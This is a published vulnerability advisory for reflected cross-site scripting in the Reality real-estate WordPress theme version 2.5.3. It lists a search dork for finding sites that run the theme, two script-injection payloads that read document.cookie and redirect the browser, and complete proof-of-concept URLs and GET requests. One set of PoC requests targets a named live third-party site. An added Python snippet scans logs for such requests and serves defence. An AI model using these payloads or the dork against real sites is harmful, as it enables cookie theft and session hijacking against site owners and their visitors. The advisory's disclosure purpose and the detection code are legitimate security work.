[+] Exploit Title: Reality | Estate Multipurpose WordPress Theme v2.5.3 - Multiple Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/reality/
[+] Date: 2020-06-20
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: InwaveThemes [ http://inwavethemes.com ]
[+] Software Version: 2.5.3
[+] Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] Unauthenticated and authenticated reflected XSS vulnerabilities were discovered in the Reality theme through 2.5.3 for WordPress.

[i] Demo account: poc_user / vector (login / password)



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?label=[payload]

[x] Authenticated Reflected XSS / Content Spoofing



### [ Payloads: ]

[$] 1"--><img src=x onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;>

[$] "><script>alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;</script>



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://plazaestates.es/en/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E

[!] GET /en/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1
Host: plazaestates.es



### [ PoC Authenticated Reflected XSS: ]

[!] http://reality.inwavethemes.com/dashboard/?tab=%22%3E%3Cscript%3Ealert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3C/script%3E

[!] GET /dashboard/?tab=%22%3E%3Cscript%3Ealert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3C/script%3E HTTP/1.1
Host: reality.inwavethemes.com
Cookie: [cookies_here]
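
[i] Added example, not part of the original advisory: a log check that flags requests whose `label`, `keyword` or `tab` parameters (the ones carried in the PoC requests above) decode to markup characters, including nested percent-encoding. The sample request lines are constructed and the function names are this example's own.

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters the PoC requests above show being reflected.
WATCHED = {"label", "keyword", "tab"}
# Characters that let a reflected value break out of an attribute or comment.
BREAKOUT = set("\"'<>`")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2522 -> %22 -> ")."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_line):
    """Return [(param, decoded_value)] for watched params carrying markup."""
    _method, _, rest = request_line.partition(" ")
    target = rest.rsplit(" ", 1)[0]          # drop the trailing HTTP/x.y
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        if name in WATCHED and BREAKOUT & set(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Map line number -> hits, skipping clean requests."""
    return {n: h for n, line in enumerate(lines, 1) if (h := suspicious_params(line))}

# Constructed sample request lines (shortened forms of the PoC requests above).
SAMPLE = [
    "GET /en/properties/?status=sale&keyword=villa&label=new HTTP/1.1",
    "GET /en/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%3E HTTP/1.1",
    "GET /dashboard/?tab=%2522%253E%253Cscript%253E HTTP/1.1",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE).items():
        print(n, hits)
```

[i] A legitimate keyword search containing an apostrophe is flagged as well, so treat hits as triage input rather than confirmed exploitation.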



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector